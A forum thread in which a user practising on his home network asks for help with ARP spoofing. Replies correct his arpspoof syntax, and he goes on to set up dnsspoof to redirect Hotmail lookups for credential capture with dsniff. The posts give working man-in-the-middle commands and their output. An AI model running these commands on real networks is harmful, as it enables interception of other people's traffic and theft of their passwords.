Page 1 of 2 12 LastLast
Results 1 to 10 of 20

Thread: ARP Spoofing problem

  1. #1
    Senior Member
    Join Date
    Jul 2004
    Posts
    548

    ARP Spoofing problem

    Hi,

    I have a home network, and this is kept together by a Linksys WAG54G-UK v1.2. Now, I've been following Irongeek's (amazing) tut on "A Quick Intro to Sniffers" - but I've encountered a few problems.

    Firstly, I'll explain about my network: I currently have my Windows laptop connected via an ethernet cable (to make sure Knoppix-StD will be able to access the network - this is the computer I do the spoofing from) to my router, and an iMac G5 connected to the router via wireless. I tried using Ethereal (while on Windows) to detect the packets coming from the Mac as I accessed a website on it, but that didn't work - so I'm guessing this means that it's a switch.

    OK, I then booted up Knoppix-StD on my M$ laptop, and checked that the ethernet connection was working - the internet could be accessed, and I was able to ping the iMac (at 192.168.1.101). So, I then went into terminal and typed "echo 1 > /proc/sys/net/ipv4/ip_forward" as the tut says (this, for those who don't know, enables packet forwarding). My laptop's IP address is 192.168.1.100.

    I then did:
    Code:
    arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
    0:f:b0:1:52:e5 0:12:17:df:56:61 0806 42: arp reply 192.168.1.2 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:12:17:df:56:61 0806 42: arp reply 192.168.1.2 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:12:17:df:56:61 0806 42: arp reply 192.168.1.2 is-at 0:f:b0:1:52:e5
    ...
    These lines kept on being printed! So much for keeping it in one shell! lol

    I then opened up another shell and type in:
    Code:
    arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null
    0:f:b0:1:52:e5 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 0:f:b0:1:52:e5
    ...
    These lines also kept being printed...So, I assumed that it was working.

    I then opened up a third shell, and typed in: "dsniff". This returned the standard "Sniffing packets on eth0" (or something similar to that - I forgot to save it), but nothing else came up. I even went onto my Mac and started uploading things to sites via FTP, access webmail accounts, but nothing showed up.

    As I thought that was quite odd, I opened up Ethereal, and started capturing packets. (I saved the packet capture file - it can be found on my site here). There are lots of ARP packets, but I received no TCP ones (from the Mac) and I also received some other odd packets. Could someone please tell me what I am doing wrong? I would really appreciate any help! Thanks in advance,

    J_K9

    P.S For those of you who've looked at the Ethereal packet capture file - 192.168.1.106 is a desktop which sometimes connect via wireless (it has a static IP address), but isn't connected at the moment.

  2. #2
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Don't know for sure, but one thing that I would remind you is that things like Dsniff work, at least partially, on the concept of a gratuitous arp (unrequested). Basically when you use that arpspoof program, what it is doing is basically saying that 192.168.1.2 is-at 0:f:b0:1:52:e5...

    Normally with arp, what would happen is a system on the local network would ask: Who has 192.168.1.2? Under normal situations, 192.168.1.2 would reply with something similar as above but with its correct MAC address. The reason this arp is gratuitous is that nobody asked who 192.168.1.2 was...now...why is this important? Because many systems, even if they didn't ask the question, will observe the ARP response and cache it...so what you are hoping with the arpspoof is that whatever NIC/system is listening will cache the bad MAC address (your MAC)...so an answer could be that the system you are after is ignoring the gratuitous ARP.

    Anyway, what you are hoping is that the system you are after will think that you really are 192.168.1.2 and will therefore forward the packets to your MAC address, which if you wanted to play nice you would have to make sure you forwarded the packets in turn to the correct address (I wouldn't think you would use IP forwarding for this since they are on different layers of the stack)....anyway...too early in the morning and not enough coffee yet...will revisit to finish the answer if someone hasn't picked up my slack.
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  3. #3
    Senior Member
    Join Date
    Mar 2004
    Posts
    557
    Hi

    I'll continue
    ARP[1], as its spoofing has been well-described by Nebulus, will
    connect Layer 2[2] with Layer 3[3]. If you want to exploit the
    ARP caching, you have to make sure to spoof the correct
    cache. It seems to me, that you are not doing this.

    Code:
    Your machine: 192.168.1.100
    Your iMAC   : 192.168.1.101
    Your Gateway: 192.168.1.1    (<- assumption)
    In order to spoof the correct cache, you would have to

    Code:
    arpspoof -t 192.168.1.101 192.168.1.1 >/dev/null &
    arpspoof -t 192.168.1.1 192.168.1.101 >/dev/null &
    if I remember the command line options of arpspoof correctly.
    Anyway, you get the idea. This is all well documented.

    Note also the different position of "&", which will solve your
    problem of having the lines printed.

    Cheers.


    [1] http://www.faqs.org/rfcs/rfc826.html
    [2] http://www.tcpipguide.com/free/t_Dat...ayerLayer2.htm
    [3] http://www.tcpipguide.com/free/t_NetworkLayerLayer3.htm
    If the only tool you have is a hammer, you tend to see every problem as a nail.
    (Abraham Maslow, Psychologist, 1908-70)

  4. #4
    Senior Member
    Join Date
    Dec 2004
    Posts
    320
    Are you sure the (Assusming wireless) router is in bridge mode ? Also, make sure you are not using a switched enviroment
    The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare

  5. #5
    Senior Member
    Join Date
    Jul 2004
    Posts
    548
    Thank you very much nebulus200 and sec_ware! I havent yet tried it, but as soon as I get back tonight I will. I now understand what I was doing wrong: by arpspoofing 192.168.1.1 192.168.1.2, I thought I was spoofing every machine in that network range. Thank you sec_ware for pointing out what I was doing wrong! And thanks to both of you for the extra amazing info!

    Dmorgan: Bridge mode? I said in my first post that I'm pretty sure it is a switched environment, but the point of arp spoofing (correct me if I'm wrong) is so that you can "confuse" Machine_A into thinking you're Machine_B, and vice-versa, so what happens is that the packets that are meant to be sent between M_A and M_B are actually sent through me, and then forwarded on to their intended recipients.

    I will check out what you said sec_ware as soon as I get back tonight. Many thanks,

    J_K9

  6. #6
    Senior Member
    Join Date
    Jul 2004
    Posts
    548
    OK, here's what I have done so far:

    First of all, I had to set up the network card in Knoppix-STD by running the command "netcardconfig". This enabled DHCP broadcasting, and I was then connected to the network. I am in fact posting this from the "attacking" computer.

    Once again, I enabled IP forwarding in the kernel, and got arpspoof started (even with the & after the /dev/null, the lines were still displayed). I ran arpspoof for the two-way connection, and then began "dsniff" in another aterm shell. Dsniff started up, but it didn't diplay anything whatsoever, even when I tried accessing Hotmail accounts and stuff from my iMac! So, I looked up the dsniff FAQ, and found out about another program called "dnsspoof".

    I discovered that dnsspoof was able to get Hotmail usernames and passwords, so I decided that I might as well check it out. I made a config file for it, called "text", found in /home/knoppix/Desktop. This is what it contained:
    Code:
    192.168.1.104        *.passport.com
    192.168.1.104        *.hotmail.com
    I then ran the command "dnsspoof" with the following options (results are also shown):
    Code:
    ~$: dnsspoof -i eth0 -f /home/knoppix/Desktop/text
    dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.100]
    192.168.1.101.49376 > 192.168.1.1.53: 8465+ A? www.hotmail.com
    192.168.1.101.49376 > 192.168.1.1.53: 8465+ A? www.hotmail.com
    192.168.1.101.49394 > 192.168.1.1.53: 28935+ A? lc1.bay0.hotmail.passport.com
    192.168.1.101.49394 > 192.168.1.1.53: 28935+ A? lc1.bay0.hotmail.passport.com
    The reason that there is no information under each of the two pairs is because the Hotmail page wouldn't load any further on the iMac! All other pages on the iMac, like google.com, would load in a flash, but I tried loading both hotmail.com (first pair of lines) and also clicking on the Hotmail link on msn.com (last two lines), but the same happened on both of them. Could someone please help me out? Thanks again,

    edit: I now kind of know what was wrong: "ifconfig" revealed that my IP address is 192.168.1.100, so I have now changed the /home/knoppix/Desktop/text" to read "192.168.1.100 blah blah blah". But this is now making things even more difficult: the Hotmail page now loads on the iMac, but I see nothing appearing in the terminal, except for the original lines (that dnsspoof is starting). Thanks!

    J_K9

    P.S What is the difference between the command "dsniff" and the command "dnsspoof"? I know dsniff is the set of tools that dnsspoof is included in, but what does "dsniff" from the command line do? Does it run all the tools that the Dsniff package brings, whereas dnsspoof just starts the DNS spoofing app? Thanks!

  7. #7
    King Tutorial-ankhamun
    Join Date
    Jul 2004
    Posts
    897
    Dsniff is just a sniffer that parses out passwords from common plaintext protocols(it also sometimes grabs hashes off of the wire that you can crack). DNSSpoof, as I understand it, just acts as a false DNS server and when a user requests what IP goes with a host name DNSSpoof returns what you tell it to.

  8. #8
    Senior Member
    Join Date
    Jul 2004
    Posts
    548
    Thanks Irongeek for clearing that up! Do you know what's wrong with DNSSpoof though? When I type in the wrong IP address (for my attacking computer) into the file DNSSpoof reads from, I can see that the iMac is trying to access Hotmail (yet in truth the page doesn't even load on the iMac). Then, when I type in the correct IP, I don't see that the iMac is accessing Hotmail, but the page loads perfectly on the iMac!

    Am I doing something wrong? Please help me, because I'm really looking forward to learning more about this! I also have another question though: when you use ARP spoof, I'm guessing that also poisons the ARP tables on the target computers, correct? Thanks again.

    J_K9

  9. #9
    King Tutorial-ankhamun
    Join Date
    Jul 2004
    Posts
    897
    I imagine DNSSpoof is returning the ip of the box you are running it on to the client. Since that IP does not really have the webpage on it nothing happens. Just a guess, I've never uesed DNSSpoof.

  10. #10
    Senior Member
    Join Date
    Jul 2004
    Posts
    548
    Oh OK...and do you have any ideas on how I could test Dsniff to see if it works? What I mean is, what should I do on the iMac which *should* show up on dsniff? Thanks again!

    J_K9

    P.S By plain-text password I'm guessing it can't view password when done on HTTPS/SSL, right?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •